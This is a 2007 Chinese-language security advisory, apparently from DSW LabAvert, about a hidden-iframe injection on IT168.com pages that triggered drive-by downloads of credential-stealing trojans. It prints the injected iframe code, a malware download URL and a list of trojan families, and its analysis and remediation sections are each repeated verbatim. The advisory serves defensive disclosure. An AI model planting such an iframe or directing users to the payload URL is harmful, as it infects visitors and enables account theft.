IT168.COM部分页面被挂盗号木马
DSW LabAvert小组监测到IT168网站被挂木马,挂马方式采用常见的iframe框架的方式,当用户浏览IT168网站的相关页面时会触发木马链接。被挂马页面为:[url]http://publish.it168.com/2007/0823/20070823024601.shtml[/url]
一、事件分析:
页面:[url]http://publish.it168.com/2007/0823/20070823024601.shtml[/url]被 插入如下代码,用以激活木马页面连接:<iframe src="20070823024601_files/a.htm"frameborder="0"height="0"width="100">< /iframe>,其中a.htm内嵌了a_data/index.htm页面,index页面为木马页面。当用户浏览了挂马页面后就会自动下载病 毒并运行。
下载的病毒地址为:[url]http://web.haom.us/10001/vip.exe[/url],此病毒会下载大量的病毒并运行。下载的大部分为Trojan-Spy.Win32.Delf家族的木马。如:
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 10.exe
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 11.exe
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 12.exe
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 13.exe
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 14.exe
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 15.exe
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 16.exe
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 18.exe
木马程序 Trojan-Spy.Win32.Delf.abi 文件: 19.exe
木马程序 Trojan-PSW.Win32.Nilage.bkl 文件: 2.exe
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 20.exe
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 4.exe
木马程序 Trojan-Spy.Win32.Delf.abi 文件: 5.exe
木马程序 Trojan-Downloader.Win32.Agent.csd 文件: 6.exe
木马程序 Trojan-Spy.Win32.Delf.abi 文件: 7.exe
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 8.exe
木马程序 Trojan-PSW.Win32.OnLineGames.akj 文件: 9.exe
他们运行后将监视用户系统,窃取用户的QQ账号/网游账号等。其中一部分木马做了免杀处理以逃避杀毒软件的查杀。
一、事件分析:
页面:[url]http://publish.it168.com/2007/0823/20070823024601.shtml[/url]被 插入如下代码,用以激活木马页面连接:<iframe src="20070823024601_files/a.htm"frameborder="0"height="0"width="100">< /iframe>,其中a.htm内嵌了a_data/index.htm页面,index页面为木马页面。当用户浏览了挂马页面后就会自动下载病 毒并运行。
下载的病毒地址为:[url]http://web.haom.us/10001/vip.exe[/url],此病毒会下载大量的病毒并运行。下载的大部分为Trojan-Spy.Win32.Delf家族的木马。如:
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 10.exe
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 11.exe
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 12.exe
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 13.exe
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 14.exe
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 15.exe
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 16.exe
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 18.exe
木马程序 Trojan-Spy.Win32.Delf.abi 文件: 19.exe
木马程序 Trojan-PSW.Win32.Nilage.bkl 文件: 2.exe
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 20.exe
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 4.exe
木马程序 Trojan-Spy.Win32.Delf.abi 文件: 5.exe
木马程序 Trojan-Downloader.Win32.Agent.csd 文件: 6.exe
木马程序 Trojan-Spy.Win32.Delf.abi 文件: 7.exe
木马程序 Trojan-Spy.Win32.Delf.uv 文件: 8.exe
木马程序 Trojan-PSW.Win32.OnLineGames.akj 文件: 9.exe
他们运行后将监视用户系统,窃取用户的QQ账号/网游账号等。其中一部分木马做了免杀处理以逃避杀毒软件的查杀。
二、解决方案
1、推荐安装超级巡警监测查杀以上木马。
2、请广大用户及时使用超级巡警的补丁检查功能,检查并安装系统补丁,预防更多的IE漏洞攻击。
3、为了最快保障广大用户不受木马侵害,在事件解决前请暂时不要访问登录该网站。
4、对于已经中毒用户,建议及时修改自己的QQ/网游账号密码。
1、推荐安装超级巡警监测查杀以上木马。
2、请广大用户及时使用超级巡警的补丁检查功能,检查并安装系统补丁,预防更多的IE漏洞攻击。
3、为了最快保障广大用户不受木马侵害,在事件解决前请暂时不要访问登录该网站。
4、对于已经中毒用户,建议及时修改自己的QQ/网游账号密码。
-
被挂马的页面截图:
-
a.htm代码截图:
-
index.htm截图:
-
解密后的index.htm: